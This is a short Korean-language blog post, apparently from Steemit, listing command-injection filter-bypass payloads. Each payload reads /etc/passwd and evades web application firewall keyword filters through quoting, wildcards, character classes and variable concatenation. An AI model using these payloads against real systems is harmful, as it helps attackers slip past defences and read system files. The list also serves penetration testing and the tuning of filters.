Command Injection filter bypass

in command •  7 years ago 

커뮤니티에 와일드카드를 통한 커멘드 인젝션 필터에 관해서 글이 올라왔는데 이뿐만 아니라 waf 일반적인 웹 방화벽에서 탐지하기 힘든 bypass 방법이다.

cd /etc/ ; cat passwd
cat /etc/passw"d"
cat /etc/passw?
cat /etc/passw*
cat /etc/passw'd'
cat /etc/passw[a-z]
a=pas;b=swd;cat /etc/$a$b

command injection hacking bypass waf
7 years ago by

Downvoting a post can decrease pending rewards and make it less visible. Common reasons:

  • Disagreement on rewards
  • Fraud or plagiarism
  • Hate speech or trolling
  • Miscategorized content or spam

Submit
$0.00
    2 votes
    0
    Authors get paid when people like you upvote their post.
    If you enjoyed what you read here, create your account today and start earning FREE STEEM!